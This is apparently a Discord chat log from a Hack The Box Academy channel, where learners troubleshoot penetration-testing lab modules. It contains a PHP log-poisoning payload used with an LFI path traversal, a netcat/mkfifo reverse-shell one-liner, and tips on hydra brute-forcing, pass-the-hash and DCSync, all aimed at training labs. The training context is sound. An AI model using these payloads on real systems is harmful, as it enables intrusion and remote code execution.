#modules
im making it send user agent as '<?php system("id"); ?>' and it wont work
Agreed because Ive stolen that tip from experts.
but it works when i make it send 'poisoning'

it returns this
/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=id HTTP/1.1" 200 2235 "-" "'
but when I do 'poisoning' it returns
/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log HTTP/1.1" 200 2217 "-" "'poisoning'"
yeah thats the issue I was having when I tried with curl
but it Just Worked^tm for me in burp
good lord ran nmap on the next host after the initial host of AD and it took 15 mins to finish
is that with the embedded cmd, or with the $_GET version?
oh just remembered
you can load the error.log as well, and itll have if there was any issues with your php code
because your php errors will get logged there if something went wrong.
will note that typically if anything went wrong with my injection there I had to reset the box. Which is why Im annoyed that log injection seems to be the only route, cause it demands perfect payload or else you brick the vector.
but also true to life
The first irl LFI I found I bricked it, so oops.
embedded
like the one where its '<?php system("id"); ?>'
lemme try
try again with the $_GET version but reset the box first to clear all the logs. If it doesnt work, load the error.log and see what it says
k
huzzah got the sql users remote workstation flag with 5 mins left
I made it way harder on myself.
like way harder
that was the general impression I got lol
its a bit messy in error log ill just reset the box rq (didnt make it clean)
honestly my biggest take away from the skill assessments for those was to not get too picky about my preferred methods. I got hung up on one of the sections because my preferred way didnt grab the info I needed. and also the module recommended way for one section had very little info on actually doing it and I had a hard time getting it to work till I realized a popular different tool already had it baked in.
yeah it fills up fast, especially if in the same instance as all your precious enumeration for the first part
i sent a '<?php system("id"); ?>' agent head from burp to it
and in the error log there was more stuff but nothing useful
what did it say
2022/12/01 20:13:35 [error] 11#11: *21 open() "/var/www/html/ilf_admin/js/jquery.js" failed (2: No such file or directory), client: 10.244.5.13, server: _, request: "GET /ilf_admin/js/jquery.js HTTP/1.1", host: "159.65.89.136:31249", referrer: "http://159.65.89.136:31249/ilf_admin/index.php?log=../../../../../var/log/nginx/access.log"
that looks like just an error from loading the full page
are you using the repeater method I mentioned?
yeah I leave it on just long enough to capture the first index.php request and then send it to repeater
the new error log hackthebox server wont let me send because it tells me dont send the same thing over and over again
can i dm it to you
Hi, what are the ranks on htb, where can we see the list of all the ranks please
sure
Good evening! In the live engagement (shells and payloads) How can I use an exploit from exploitdb in the msfconsole! I get a permission denied error when typing "updatedb"
Sudo
@thorn urchin I know you mentioned Dante its 95 dollars off atm
Is Pass the Ticket target borked for anyone else?
@thorn urchin sent the coupon code in a dm, looks like it covers the 1 time setup fee
Can't even ping that man. Not sure why.
Is there any one on one help a person can get for beginners. Im going through the readings but im having trouble navigating and using the boxes.
is that it?
yeah some modules arent loading correctly it seems
I was having an issue
alright, vm it is. Thank you sirs
Heyo. I just read last posts. I have really hard times finishing Nibbles on Getting started. I get to the point when I generate host, and I'm about to upload PHP to my_images to create reverse shell. But then nothing changes in my_images. Netcat doesn't open any shell. And those servers keep falling down.
You got to move to the Starting Point chat this is Academy chat
Wrong section
Oh sorry.
ok
np lots of folks end up in this chat
@covert latch no this is the right place. Getting Started is a module and it walks you through nibbles
but unfortunately I remember nothing from that box so idr
ooo I was thinking the getting started on the main site
I think it might be on both
There is a problem that even if I follow it step by step, nothing works. Even when I tried to use metasploit to get around, even some other php reverse shell scripts nothing works for me
And those generated hosts fall down after 15 minutes
And in pwnbox they didn't work at all
So I was wondering if HTB has some issues
this been an ongoing issue or just today issue
cause HTB def having some issues today
I started it yesterday. But there I think worked well. And today I can't get through.
yeah it might just be todays issues messing with ya
Id take a break and check in after a couple hours or tomorrow
Oki! Also I was wondering. does the .php file have to be named image.php? Because when I was trying to upload shell.php it didn't show there on the list of files. If anyone knows?
web apps can vary but name should largely be unimportant outside of the extension
Okay thank you. Then it might be connected to todays issue they didn't upload.
Yeah Im having issues with the AD skills assessment 1 now that ive come back, tried uploading chisel and it died
yeah everyone just go touch grass for a bit
It would be strange, it's pitch dark outside
night walks are the best
I have the same problem, can I dm you ?
sure
@pastel ginkgo use metasploit
For?
I used chisel it worked perfectly
oh then i misunderstood
now im just trying to figure out how to get tools located on the machine now
Will anyone help with nudge in the right direction for Broken Auth: Skills Assessment?
I've found a user and a couple of cookies. I haven't successfully decoded the cookies. Looks like they end up being ||MD5|| and I hit a wall.
||echo(base64_encode(md5('USER')) . 6 . base64_encode(md5('ROL')));||
@queen hatch
u dont have to decode
u have to try to cook one
thats what i have done
I figured decode to view the contents and work your way back up
Otherwise, I'd be guessing contents. But that makes sense. Ty!
Can anyone help me with 'Introduction to Bash Scripting : Flow Control - Branches' ? im not sure why the number i get for the salt is incorrect
idk why but I cant run any power view commands
did you Import-Module first?
Yup
@thorn urchin Where did you get your PowerView from? I can't get any powerview thing to work at all.
I didnt use powerview
How did you get bloodhound working then?
I got it on the remote system but it wants a database thing
hello hackers a lil guidance please..... Footprinting Hard Lab and I'm trying this command: "ssh -i private.key tom@10.129.53.210" with the key found in the IMAP server. But I got this error: 'Load key "private.key": error in libcrypto
tom@10.129.53.210: Permission denied (publickey).' Permissions have been changed. It worked on the easy lab, did I miss something?
sounds like the key changed
do i have to retrieve the email with key everytime i get a new ip from htb?
uhh im very basic noob level but doesnt ssh need to generate the public key pair everytime, your private key may be the same and should be, but the public key is mutually negotiated using the private keys of the things trying to talk to each other
actually the private key would change if its generating a session based key i think i dunno

not sure why an imap server would be storing a private key though thats some bad juju
What section are you working on? or did you get it figured out?
I need some help on cracking miscellaneous files and hashes. Anyone got me?
The skills assessment and I haven't yet
which course?
thanks the key is fine i redid the email it has to do with permissions or lists of known hosts
i used mousepad which worked on the easy lab?
sounds like you got it then?!
i havent done the module or any module actually so 
could it be htb server. i noticed its acting funny
still get same error public key
did you chmod the key once you copied it over?
yes to private specs
Load key "private.key": error in libcrypto
tom@10.129.202.20: Permission denied (publickey).
got it, i wasnt copying the whole key. left out BEGIN OPENSSH and END OPENSSH lol
nice
thanks for the help!!
Ad Enumeration
Well.... I'll be asking you these question then! lol, I have not got that far yet... I have 5 more sections before I get to the skills assessment.
Yeah its a beast of a module, the skills assessment is pretty tough but doable, im just stuck atm because I can't get powerview or bloodhound to play nice
the collection ingestor shouldnt need a database thing cause its what you feed to the database. iirc I used the python bloodhound ingestor over a chisel tunnel using the found creds.
Yeah I was getting stuck at bloodhounds login screen
@thorn urchin How did you get it to run over the proxy? Im getting errors saying it cant resolve the domain controller name even though its set in my host file
Having a bit of trouble with the question on https://academy.hackthebox.com/module/41/section/441 - seeing as this is the first section of the module, and we haven't been technically taught to deobfuscate JS code yet, I would naturally assume that the plaintext flag I can see in the obfuscated JS code is what I should be submitting to pass the question. However, it's balking at me that it's incorrect. The answer I'm providing is ||HTB{1_4m_7h3_53r14l_g3n3r470r}|| - am I missing something (non)obvious here?
Edit: Solved
proxychains and using the cmd flags to specify the DC iirc
yeah ive been trying || proxychains bloodhound-python -d INLANEFREIGHT.LOCAL -dc DC01.INLANEFREIGHT.LOCAL -c All -u xxxx -p xxxx ||
hmmm idr but try specifying the IP address for -dc
requires fqdn rip
lol
idk why lookup is failing
im about to go into my pihole server and set it there
oof yeah idr
ah here we go
try --nameserver and setting it to the DC ip
and maybe tack on --dns-tcp for good measure
you're amazing
adding the tcp got it working
so entire command + nameserver and dns tcp
sounds about right
lol its microsoft everything has spyware and malware looool
no, hes just replying to a really old message lol
ah he's out here grave digging
uh ya I just logged back on so thats actually where my chat history left off and started me at
hmmmm
Could someone give me a hint to make the password mutation challenge complete a bit faster?
I let the original ask (use the resources.zip to create the mutated password.list file) run for 2ish hours with no luck, and am now attempting the challenge with the example list from the guide.
Break it into chunks || and start in the B's ||
Bro i need a teacher on HTB
i swear its pretty hard
but im in for it i bought the platinum since it comes with 1000 cubes with the deal
Do you suggest I go back to the resources.zip file custom ruleset
You can break it into chunks using grep if I remember correctly
yo just asking how long should i spend a day on HTB im at highschool at the time so any advice
up to you and how interested you are in the subject
gotcha but reading it is a bit hard i wish it was a bit simple
for metric when a module says 1 day or so, it usually means 8 hours of solid study in the day. But background varies things a lot.
I see 8 hours is a day pretty much huh sucks for me i have a really bad attention span i doze off 30 seconds of focusing
Well youll need to either fix that or get a diagnosis and some meds to help with that
woah meds
otherwise itll be very hard to survive in this field
i see what you mean
can begin with diet
drug talk is banned from this server
but I can attest that wont be helpful either
but ya focus for significant lengths of time is an absolute necessity
bro i just watched breaking bad its on my mind
I aint a mod, I got temp banned for talking about drugs so
they take it seriously
get off the processed foods/ fast foods, drugs, and porn and eat lots of homegrown fruits veggies and meat. Then youll be able to focus
yes when I'm totally interested in something ill give it my entire attention it's pretty much instinct to just do it but when I'm not then that's the problem how can I take interest in it I do have it but just looking at the reading part it says otherwise
Porn is oooof where i suffer
@thorn urchin Im lost, I did the dc sync I got the administrators hash but I cant crack it.
thanks for giving the advice, screenshotted it, have a good day
idr exactly but unless the question specifically asks for the password you probably dont need to crack it. Hash is as good as a password often.
when all else fails just stay calm and enumerate
once you have dcsync theres usually not much enumeration left
you cant kerberoast without the password of the user
trying to brain storm it but im stuck again lol
what module you working on?
and kerberoast sounds tasty is it seasoned with garlic and other herbs?
Hash as good as password was a hint
ok I finally got it
idk why but after doing pth I wasnt able to access the remote site with cd \dc01.inlanefreight.htb\c$
but I was able to do net use x: \dc01.inlanefreight.local
and drill down from there to the flag
hey whatever works
get r done
im going to ask you tomorrow on how you got it working so I can add it to my notes lol
im rushing to take screen shots before my box goes down atm lol
Got to say that assessment was brutal but shit I learned alot
I can't get this damned password mutation challenge done with.
The box keeps timing out causing me to have to reset it.
I'm sure I'm doing something wrong.
I'm currently following what @pastel ginkgo suggested but I still can't even get through one .list file before the box expires.
HTB should give the option like THM to add more time to the box instead of just the option to reset it.
ive noticed though that if you keep active on the box even when time runs out it will still remain active for a long time.
I've seen differently unfortunately.
Had a continuous ping running on the box while BFing it to test your theory out and the ping died when the box did. Hydra died soon after.
adding time isnt a feature on the academy but think on the main hack the box platform it allows you to add time. I remember a few times being gone for days and coming back to a box and it was still up in the exact same state I left it.
thats because those boxes are public
if nobody resets it then they stay as they are. unless you have vip and get private instances
Well they should add it to the academy then, especially on boxes where we are (assumedly) supposed to be running longish-term brute-force operations on them
a lot of times if you know the machine and its use or some other detail you can reduce your username list or password list to more likely candidates and it will speed your brute forcing quite a bit.
that module specifically is just pretty terrible. Its not usually a problem outside that one module
also if youre trying against ssh youre gunna have a bad time, even though thats what it tells ya to do.
Agreed on both points.
I suppose I should be able to run the same attack against SMB
which module password attacks? ya it was tough. Had to reference a lot of material on the interwebs and lots of forum and Discord help to get through it.
is there anyone can help on the question "Predictable Reset Token"?
its not tough, its just annoying and wastes your time
Specifically the password mutation piece
its the worst module in the whole course so far
ya smb and ftp allow for much better brute forcing you can really crank up hydra with ftp
-t 64 for the win!
but youll feel like a pro at password cracking after you complete it
eh not really
a pro hydra script kiddo haha
just not really how youd go about things in the real world most of the time
the mutations thing a bit, but not that extreme except for offline cracking, theres better targeted wordlist methods if you really wanna go that route(that lightly is covered in a different module), password spraying methods are far more common.
the file and hash cracking stuff is a bit more common, but a little lite in the module imo
just download some leet passwordlist from some other experienced hacker
the pass the hash and pass the ticket sections that got recently added are the most valuable parts of the whole module
def have those notes good cause youll use em in the AD module for sure
noted
Feeling kinda dumb: On Using the Metasploit Framework :Sessions ...ive run nmap in so many configurations including different firewall and IDS evasion techniques ...and im going a bit wild. the web server isnt being run on the common ports and im stark out of ideas that dont take a 24hr long nmap scan that i cant do due to target time limit. lol pls hlp
Hi, I am stuck at the last question on AD skills assessment 1. I got tp***y user and password hash and administrator hash. How did you get access to dc01? I tried pth on mimikatz did not work . Could someone gimme a hint?
I think I have been at this too long today.... Is there a way to get a NTLM hash in powershell without using tools like mimikatz or powerview etc? I got the answer to the module I am working on (attacking domain Trusts child -> Parent Trusts from linux) using linux, but the question's wording makes me think I should be doing it from the shell I got on the DC in powershell...
is there anyone can DM me?
message me
do you recommend any other subscription services to go with HTB Academy? Is TryHackMe the only one I can add in? I don't think TryHackMe is good for learning is why I'm asking because it really seems like you learn a topic and never use it again on THM
is there a good reason to do both HTB Academy and THM at same time?
what is another place I can go to that is similar to complement HTB Academy?
now how tf do i do this shit
I stopped thm for quite a long time. HTB's content is much better. If you've already finished most academy modules, you can start HTB. hackmyvm is also a good place to go.
I'm still doing basics of HTB Academy. Is doing TryHackMe and HTB Academy concurrently to reinforce basics a complete waste of time?
I'm thinking to reinforce fundamentals
I've completed 222 rooms on thm, to be honest, no specific room gives me an unforgettable memory.
Ok
Would learning Python be better?
To do concurrently?
Or earning CompTIA certs?
as for academy, there's only 2 or 3 modules left, cuz i think it's kinda expensive for the cubes.
Ok
:o
welp i dont have those many cubes
how to earn em
But CPTS job role path is preferably done after information security fundamentals path
....?
I have a programming background, so I would definitely suggest you learn python.
you have to buy them
ik python tho
i found it cheaper to buy the sub
you can't unlock tier 3/4 modules with subscription.
ohh your talking about non-academy stuff
how to get more cubes without buying em
you cant
The tier 0 modules only cost 10 cubes and refund 10 cubes on completion, a fresh academy account gives you 10 cubes. So theres a number of modules you can do for free so long as you actually finish em.
So what would be a good complement to HTB Academy while learning? Python?
I was gonna pick between TryHackMe in addition to HTB Academy or do HTB Academy and Python on side
What do you think?
I'm starting to think HTB Academy and Python is good enough?
Learning both sounds good to me. You'll use python daily but.... Tbh. I can't program. I can only read/understand sorta. Can still hack tho
Hello can I dm someone for broken authentication->brute forcing passwords? I have a couple of days stuck in that section thanks!
Module: Getting started
Part: Initial foothold
Problem: Can't open reverse shell.
Greetings again. Server is now working well, but I have a different problem. I will keep it short. I can login to Nibbleblog. but problem is that if I upload anything named other than image.php it doesn't show in the /content/private/plugins/my_image dir. And if I upload the image.php file it changes but when I try curl or open the file through firefox it won't open a reverse shell on my netcat. It just processes and then nothing. I'm stuck on this and I do not know what else to do. I read here in history some people had similar issues, were there some solutions to them?
I tried PWN box thinking that there might be problem with my system, that it might block reverseshell but when I try open generated website in pwnbox it say connection has timed out in browser.
@covert latch maybe u did not set the reverse shell in the correct way
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 9443 >/tmp/f"); ?>
I have it copy pasted in the image.php file
From HTB
nc is listening on 9443
but I tried to put verbose on curl now and it says this
* Trying 10.129.162.210:80...
* Connected to 10.129.162.210 (10.129.162.210) port 80 (#0)
> GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1
> Host: 10.129.162.210
> User-Agent: curl/7.85.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Fri, 02 Dec 2022 08:53:23 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host 10.129.162.210 left intact
@covert latch try to create a php reverse shell
I thought it is that one on top. That code which is put in .php file and then upload to images
No
DM me if you still need help with it
anyone can help on Q2 of Predictable Reset Token?
for that one zap stuff was so bad i wasn't able to do that in zap (just gave it a try and it worked this time but burp is still better) burp is so much better for that so use it, also there are only 17 usernames in the username wordlist so you can try it manually for a sanity check
sure shoot me a dm if you still need help with that
Hello I try to connect via pwnbox on the spawned machine. I wait for 10 minutes and the spawned machine is not up. Not scannable. Anyone have this problem?
which module are you on? I think I have the same issue on the Attacking Enterprise Networks module
Hey guys, I'm having problems with the question on File Upload Attacks - Blacklist Filters. Could someone help? Thanks
sure what's the issue?
I'm running burp with an extension wordlist to check on which ones are allowed and which aren't, the problem is all of them are reporting a 200 reply
When I try to upload them I am met with an error
I think there is an on-going issue with academy modules of where connecting via ssh just isnt happening. its just holding. - currently i am on the Active Directory Enum stage
that's the code even if it failed the page will still load so you still always get a 200
look at the length
They all say File successfully uploaded though
They all give out the same length
i got the same issue on the Attacking Enterprise Networks module
anyone can help on Q2 of Predictable Reset Token?
been the same since 6am.
here try this #modules message
for me it's been 2 day
oh wow ok!
all of the one that have docker target seem to be working fine
which section are you on?
i'm solving the question 2
oh
any feedback from HTB on the issue?
Looking at length on the burp responses
oh wait then what's the issue?
i don't think the academy have one, there is one on the main site, if there is then i got no idea how to check but we could try to ask support
Same on WordPress hacking and active directory i think it's a big issue
if every request show the same code and length then i think you should check the fuzz request
i don't have idea what to do next after decoding
hint change the ||role||
always on the day i commit myself lol
same
back to the drawing board then i guess
Ho if you have unreachable like this change your vpn to academy 1 and restart both machines
im running directly from the instance...
im going to attempt a reset again
@vital adder can i DM you?
sure
@distant oar can I dm?
Im having this issue as well. Running straight from the instance. Glad i looked on here, thought i was doing something wrong
Can someone help me out with windows priv esc module? In the SeDebug privilege section. The exercise says navigate to computer settings > windows settings > security settings, but neither my host or remote windows boxes have those options. I mean I have settings > windows & security but nothing in their looks like what's in the example.
Yes but change the vpn of the instance
Oh sry just confused the channels
no worries
your username is kinda familiar also i think that's in windows server only or something, i can't remember which version is the target windows is but if it's a windows server it should have that (i think) but you don't need to do that part to complete this section
which module and section are you on?
anyone help me at section interrogating... https://academy.hackthebox.com/module/81/section/787 ? idk what the answer is on the first questions
i need some help understanding something in the Nmap module IDS/IPS evasion
so im trying to scan the target using a different IP source, with the -S flag, and specifying the interface to tun0, but the result is weird, nmap replies with failed to determine route to target! i looked into the "routing table" and it seems everything is ok, looked into the nmap official docs and nothing checks out, so whoever has some knowledge in this please help
Hello, can somebody help me with Command Injection Skills Assessment, I have found the HTB forum, but it doesn't really help. Can you write to DM, I'll send to you my screenshots
~~Can I get a hint for Broken Auth Skill Assessment?
I'm stuck with error ||User support cannot have requested role||. Not sure where to go from here. I'm also not sure if I should know what to do with ||htb_sessid_persistent|| yet.~~
Hint: Figured out country code. I'm able to move forward again.
Hello, Can someone help me to find what the admin email address is in IMAP/POP3 in the foot-printing module?
Enumerate all of the open ports. If you need further help you can dm so no spoilers are given
Hello,
Any issues with the platform at the moment? Network connectivity mainly.
There are issues with the Pwnbox across all platforms if that is what you're referring to. I haven't noticed problems with anything else
Getting an issue with a retired box is all. 100% htb side unfortunately.
This is for HTB Academy. You can ask in #boxes , reset the box, or contact tech support on HTB
k
Hello, can somebody help me with Command Injection Skills Assessment, I have found the HTB forum, but it doesn't really help. Can you write to DM, I'll send to you my screenshots
I'm really curious how you managed to take blurry screenshots
Anyway, the issue is that you're not injecting any command really. Your command just comes as text after the argument
That's chopped quality, if you want I could give full screenshots, but a bit later
You need to separate it into 2 commands
@solar granite hey man, do you have any idea why the -S command cannot work in my case ?
I've no idea what you are talking about
.
is there someone can DM about "Work on webapp at URL /question2/ and try to bypass the login form using one of the method showed. What is the flag? " under weak bruteforce protection > insecure protection
As you can see, I tried ||, &&, ; and %60 to separate that, but it didn't really help
I can't quite see properly, it's too blurry. I only spent time on the first pic, where there's no operators. Anyway, finding out which operators work is a big part of command injection. ||&&|| should work if memory serves
Hm... I write you to dm, when will be free, ok?
Sure
Does it work without the -S? I just tried and -S ... -e tun0 works fine for me
so weird, i tried 2 machines till now and it didnt work, and yes it does work without the -S flag
all nmap flags are working without this tiny monster , but if you tried it on academy boxes i guess i cant complain
Nevermind
I'm not very familiar with how -S works exactly, but I tested previously with a known IP on my network
I just did a test again with the same IP you used (10.129.2.200) and I got the same failed to determine route to 127.0.0.1 error
I'd guess the spoofed IP needs to have a route to the target IP
yup it seems i got that wrong , its not that well explained i must say
anyway thanks for the effort man ! really appreciate it
Thank you, I just wasted an hour trying to enumerate the version, lifesaver
anyone experiencing problems with starting an instance?
when i try to start one it won't work and i get the error 'request validation failed' : /
you connected on OpenVPN?
no
Learn how to connect to the VPN and access Boxes on the Main Platform.
But I don't need to connect to openvpn to start an instance in the webinterface? It worked before.
I think that's the point of spawning an instance in the browser?
are you VIP?
Student license
@limpid raft you can try clearing cache and data?
Oh that worked, weird. Thanks!
so i been stuck on module Nmap, Section IDS/IPS evasion "Firewall bypass" for 6 hours, and cant get the answer right, i was reading a lot on the nmap site so that's why, anyway something in the module is not really explained well and the nmap site didn't speak much of it, im stuck since a long time now and i need help, i get a response from the target using another method to bypass but the answer is still wrong .......
its working with a decoy, but the OS detection is probably wrong cause the answer is wrong and the other example just like i discussed with @solar granite is not working because of some issue with the routing "and i cant figure that out even if i tried to add something to the routing table i dont know what it should be because the -S flag itself is not well explained!"
why are you using decoys and spoofed source addresses? Theyre useless in modern scanning, and you wont get any responses back from spoofing the source IP address if you dont control the address youre spoofing too to collect the results.
now spoofing the source port can be helpful, but not the source address
Decoys were used back in the day for plausible deniability when scanning wasnt as common and thus more scrutinized as well as a lack of easy access to VPS and proxy hosts to mask the origin of the scan. So the decoy option was useful to throw up a bunch of noise that made it harder to pinpoint the attacker. Nowadays its kinda pointless and doesnt do much for firewall or ids evasion. Its a relic of the 90s when it was implemented. It honestly shouldnt even be taught anymore.
sounds good, but what should i do then to not be detected? im trying to split the packets into small fragments and that's working for not getting detected, but... the answer of the OS is still wrong!!
you can always go slower
Please i need help with introduction nosql injection
well im waiting for the scan to finish im using the --mtu 16 option, the -f is too slow!
overcomplicating things
you can adjust the raw rate
why do i have this shitty username
it was Faster! not much detectable for the machine i was trying on, but the results are still the same, no OS detection
Thanks for the tip tho, i never thought i would ever try that!
@fierce pond which section are you on btw?
the firewall/ids evasion section doesnt have a practical section, and then there are three labs, Easy, Medium, and Hard
Good evening! Im having trouble with the live engagement labs :( :( I cant manage to use the exploitdb module in the msfconsole
The Easy one XD
it got me crazy so i didn't pass it, i thought i might learn stuff while doing so... but it has been a long time and i cant figure it out!
youre super overthinking it then
script scan can get it no evasion necessary
it doesnt want the exact os version, it just wants the distro name
You are digging too deep! Happen to me first but the "distro" hint is worth gold!
Yup
if its any consolation the medium and hard labs should go a bit easier for you since they do require a bit more of the overthinking youve been trying
well I guess I will finish today then if that's the case, thanks for the help, really appreciate it
np
also random note to whoever needs it in the file uploads module: their recommended route of burp intruder is dumb, recall your lessons from the ffuf module and use that instead. Save the request file and fuzz for your extensions and what not.
especially nice in the parts where you have many valid uploadable extensions, but only one of them will actually execute code. Itll want you to go by them one by one but thats stupid. If you fuzz the upload with ffuf and your payload, then you can turn around and do a similar fuzz on the url param with your cmd=id or whatever and fuzz the same extension at the file upload location, which will make the correct upload that executes code stand out.
its a MUCH saner approach than whats taught in the module and more comprehensive to boot.
so youll have a bunch of shell.php3, shell.php4, etc. uploaded and then youre cycling through them when testing which one is the one you need for the challenge too instead of doing it by hand like a monkey.
This has downsides too, like, how df am I supposed to know what headers to include, and creating such an ffuf POST request is not easy and quick
thats why I said save the request from burp to a file
which is covered in the ffuf module
I didn't do that module yet
Can you use FUZZ variable in the file with entire request?
yes
not gunna say my way is always the best way, but if you dont have burp pro, it will be better than using burp intruder every time always.
Madf0x you and MrTom are the unofficial heroes of this chat lol
thanks
at the very least the takeaway is dont be afraid of trying a better method you know just because its not whats taught, especially if its something you HAVE been taught in a previous module because it might be fair game or even expected in the final assessment
Hey guys, having a bit of trouble with Shoppy after the initial foothold, anyone can give me a nudge please?
Man hate asking for help on this one but struggling a bit in the FFUF module (BRB 1 sec then ill finish)
well I was just preaching ffuf
Haha yea I've read through it a couple times and I've got to be missing something really small
@thorn urchin Did you ever get this error after building chisel on your linux box? I didnt get this yesterday with my windows build
I used the pre installed chisel for my Linux side of things, and only the built one for the windows stuff
okay so on page fuzzing our goal is to find the /blog pages etc etc.
I've tried
ffuf -w /wordlist -u <ip>/blogFUZZ
I've also tried <ip>/blog/FUZZ as well as <ip>/blog/Fuzz_1.Fuzz2
I've found a 403 .phps for extension but have not found anything else with FFUF
its saying you should try searching for various index pages to see what framework its running
so you want something more like /blog/indexFUZZ assuming youre using thr web extensions wordlist
ahh I did not try that
then when you find out what ones are accepted you can swap things around
I see that now just passed the Fuzz_1.Fuzz_2
and do a /blog/FUZZ.ext while feeding it the common directories and files wordlist
you can do it both ways with FUZZ1.FUZZ2 but itll take awhile as itll do every combination of both and you have to specify the two wordlists with the correct identifiers.
Yea i gave up at 1 million
lol
Okay let me work with this a bit ty
I was on the right track, just needed to try a little more
the web extensions one also adds a period too iirc, in which case youd actually want FUZZ1FUZZ2 or else youll get results like blah..php which some webservers are okay with some arent
@thorn urchin gonna pm for clarification
Im starting to see why @thorn urchin it took you so long to do the 2nd skills assessment I havent even found any users hash yet lol
I was able to enumerate some users but nothing else lol
assessment 1 is just a warm up, assessment 2 is the real test
oof
start with the very very basics
every pentesters favorite first tools to run once on an internal network.
I dont think this applies to this module but the evil ssdp is pretty neat https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices
I am having trouble with the MSSQL queries for footprinting medium, can someone give me a hint or make sure I'm on the right track.
is there a way to reset module progress?
Are you receiving a [-] module 'lib' has no attribute 'SSL_CTX_set_ecdh_auto'?
or are you already past login and trying to execute queries
no im going through hacktricks MSSQL commands to query the db but stuck
I'll dm because I don't want to give away spoilers
@thorn urchin is it something really simple to get the first user hash?
I've tried nmap, various forms of smb stuff, responder variants
why responder variants
responder from the foothold right?
sure ya didnt just miss the results?
yeah I legit ran it for 45 mins came back and didnt get anything
maybe module bugged
odd
like responder was legit my first idea
ran it then made another window to do nmap scans
cause def took awhile but 45 minutes is a little long
i'll reset it and try again
my metasploit book just got here in the mail
give it a read while I wait
@thorn urchin just got the hash, it was bugged
For the Footprint module, MS SQL, I'm getting this error
Is there any other way to login mssql
This error for mssql-cli command
sounds like you either have some old packages or some borked python libs
i.e not a tool issue, your kali VM is having issues
Any other way to fix it? I don't wanna change my VM, I got everything installed for CREST CRT
load the clean VM snapshot you should totally still have right and then try to update it and run from that forked instance
Will check that
otherwise update all packages and try reinstalling impacket from scratch
with a venv
Yup, I removed python as well
I both agree and disagree with this. Yes, burp community intruder is kinda useless without being able to filter, but if you only get one hit or only need to test one thing then I would say burp is a bit better (but this is the repeater). But if you get multiple hits and need to test multiple things all at once then ffuf is 100% better. Also, were you able to get ffuf to work for this? If you did pls send me the command, I was only able to get it to work with curl and a bash loop
yeah burp repeater is awesome for testing, but for the automation stuff ffuf like you said works better which is the exact situation I was describing
and Im still at work, remind me in 3 hours and I ought to be able to send over my steps
oh off the top of my head, did you use -request-proto http? cause ffuf tries to force ssl, but the docker box only supports regular http, that may be why it didnt work
So I've been subscribed to HTB academy for the last 10 ish months and it seems like I've just been kicked out?
How can I see what happened / why?
contact support?
Yea will do is there a help channel here or I guess email
oh I didn't have to use that, my only issue was I wasn't able to get ffuf to load the stuff right (I did load it through burp and I just can't get the parameter with the name to load right)
contact support via email
well if youre using -request and request file you do have to use -request-proto
otherwise you just get errors for each result
oh i just use the -u for the url the -request is kinda weird for me
yeah not using -request would be a nightmare to setup
cause using a request file means all the headers and post parameters are all gunna be filled out exactly the same way burp repeater does it, you just modify what you want and plug FUZZ where you want ffuf to do its thing
I used -u for when I was testing the actual shell commands after the uploads, but for the upload itself, I used a request file
make sense
Not finished with the module yet, but I suspect the approach will work for the majority if not all of the following sections I havnt done yet
So odd i was on student subscription and literally died/ got kicked out lol
Side question, Silver Annual Plan seems to only unlock up to lvl 2, is there a version of that that gives access to higher level modules? Or do I just have to buy all of those individually?
what you see is what you can get
so basically Silver Annual and Student give you up to (including) Tier II which I think are the best deals. Especially if you can afford the Silver Annual because it comes with exam attempts
Yea I was just on student and then it was seemingly just removed
Tier III, IV, and V you'll need to buy cubes individually or use the ones you earn from completing Tiers 0, I, and II
did the subscription end?
I mean was today the end of your subscription
Does student only have like a certain timeline?
I think ive been subscribed 9/10 months?
idk
but sadly only recently started using a bunch
also based on the prices... if you don't have a subscription plan it's a whole lot cheaper to buy one instead of purchasing cubes (and you get Pwnbox usage with it).
i.e. 1000 cubes is $100. But you can purchase Platinum for $68 which comes with 1000 cubes and unlimited Pwnbox usage
yea trying to math it out, but I think by the end of this month I've got time to commit and hopefully take CBBH early january
so kinda annoying ><
ahhaha I don't think you understand what I'm trying to say. I don't think HTB Academy has a limit on the amount of times you can subscribe to a plan.
The subscription is monthly. So what I mean is did your monthly subscription end and you need to renew? or was there some time left
I've been subscribed for like 10 months same method for payment, I dont actually know why it ended
Yea might just have to triple subscribe and unlock everything and get to work.
mhmm what does it say under the student plan
weird.. I'd say contact support. Usually when it grays out it mean it doesn't recognize your email as a university email.
Yea just kinda odd / unsure
yea I had changed my email to a personal email once I finished school earlier this year. So guess it makes sense
that is exactly why then. I'd assume today was the last day of your subscription and when it went to renew the plan it noticed you were no longer using a student email and, therefore, you cannot purchase that plan.
was hoping to be able to pay student but its all good just find the most economical way forward and keep working
You'll either need to add your student email back if you still have access OR pay for a different plan.
Yea don't have access anymore, did you say you can triple stack?
subscriptions?
I.E. I can triple subscribe the 68 / month so I can get access to what I need?
I don't, I pay for the student plan as I think it's the best deal
haha yea its obv the best deal
I'm not sure if you can "triple stack" subscriptions you'd have to ask someone else about that. You'd get 1000 cubes with that plan and unlimited Pwnbox time which I think should last you the month for working towards the CBBH or CPTS
and then it renews the next month and you'll get another 1000 cubes
yea ill figure it out, have a bunch of time atm so might just have to purchase some cubes to get it done
yeah thats almost certainly it, youre not eligible for student sub anymore and it expired. Gotta pick a new one or buy some cubes
huh it shows you prices in USD? all my pricing is in euro
support told me they couldnt do anything about it lol
Rip lol
I've had a very glitchy experience with academy subscriptions too. Glitched out the user interface by switching to university email, subscribing to student plan, then switching back to regular email. Didn't like that at all.
Happy weekend!
Thanks, you too!
is anyone available for Shells & Payloads Host2? I feel like I'm missing something so small
I might be able to help
I'll send a dm I'm going to still need help on the above if anyone has completed the module.
@vital adder I sent you my req file and my cmds I used
quick question do you still need to do the openvpn stuff if on attackbox
If your using the pwnbox you dont have to connect to the VPN. If that is what your asking?
Its been awhile. since I did that one.... do you still need help with it?
k
no you do not my friend
Module: Web-Proxies
Problem: I did it correctly but the cookie get replaced with the default cookie instead of the payload one
Hello everyone! Could someone give me some hints on how to use an exploitdb module on metasploit
@rustic sage dm me
Thanks, you too! & Where could I join in this page?
